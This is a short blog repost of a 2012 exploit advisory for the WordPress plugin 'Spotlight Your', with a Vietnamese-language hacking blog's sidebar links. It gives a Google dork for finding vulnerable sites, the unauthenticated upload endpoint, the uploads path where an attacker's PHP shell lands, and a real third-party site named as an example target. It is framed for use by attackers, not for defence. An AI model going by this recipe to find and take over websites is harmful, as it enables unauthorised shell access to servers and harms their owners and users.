Wordpress Plugins Spotlight Upload Vulnerability

Wordpress Plugins Spotlight Upload Vulnerability | Juno_okyo's Blog

Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability

Google Dork: inurl:"/wp-content/plugins/spotlightyour/"

Date: 18/11/2012

Locations: Banjarmasin, Indonesia

Author: ovanIsmycode & walangkaji

Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org

Software Link: http://www.spotlightyour.com

#################################################################################################

[+] POC

Exp. Target :

- http://domain.com/wp-content/plugins/spotlightyour/

Exploit :

- /monetize/upload/index.php

Shell Access :

- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php

Examples

http://www.buyusadeals.com/wp-content/pl.../index.php

############################################################

Leader at J2TEAM. Website: https://j2team.dev/

Juno_okyo's Blog

Wordpress Plugins Spotlight Upload Vulnerability

Đăng nhận xét

J2TEAM Cookies - Chia sẻ tài khoản mà không sợ lộ mật khẩu

PhpFox 3.0.1 Cross Site Scripting (XSS)

2012 Dorks & Shell

Hướng dẫn bảo vệ bạn chống lại các Hacker

Google Hacking DataBase (GHDB)